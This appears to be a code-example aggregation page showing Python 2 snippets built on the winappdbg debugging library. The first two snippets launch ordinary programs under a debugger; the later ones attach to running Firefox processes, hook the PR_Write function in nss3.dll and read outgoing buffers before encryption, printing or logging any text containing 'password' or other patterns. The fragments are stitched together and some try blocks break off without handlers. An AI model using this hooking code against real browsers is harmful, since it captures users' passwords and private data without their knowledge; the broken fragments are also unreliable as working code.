Beispiel #1
0
def simple_debugger():
    handler = EventSift(MyEventHandler)
    # handler = MyEventHandler()  # try uncommenting this line...
    with Debug(handler) as debug:
        debug.execl("calc.exe")
        debug.execl("notepad.exe")
        debug.execl("charmap.exe")
        debug.loop()
Beispiel #2
0
    def exit_process(self, event):
        print "Detached from %s" % self.name

        handler = EventSift(MyEventHandler)
        #handler = MyEventHandler()  # try uncommenting this line...
        with Debug(handler) as debug:
            debug.execl(self.name)
            debug.loop()
Beispiel #3
0
    def single_step(self, event):
        thread = event.get_thread()
        process = event.get_process()
        buffer = thread.get_register("Rdx")  # 2nd param buf
        size = thread.get_register("R8")  # 3rd param buf amount
        text = str(process.read(buffer, size))

        for pattern in self.patterns:
            if pattern in text:
                mylogger.log_text("-" * 50)
                mylogger.log_text(text)
                mylogger.log_text("-" * 50)


mylogger = winappdbg.Logger()
handler = EventSift(FirefoxHardHookEventHandler)

with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()

    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True

    if found_ff:
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()
class FirefoxSoftHookEventHandler(EventHandler):

    apiHooks = {
        "nss3.dll": [("PR_Write", (win32.PVOID, win32.PVOID, win32.DWORD32))]
    }

    def pre_PR_Write(self, evt, ra, fd, buf, amount):
        proc = evt.get_process()
        data = proc.read(buf, amount)

        if "password" in data:
            print "[+] %s" % data


handler = EventSift(FirefoxSoftHookEventHandler)

with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()

    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True

    if found_ff:
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()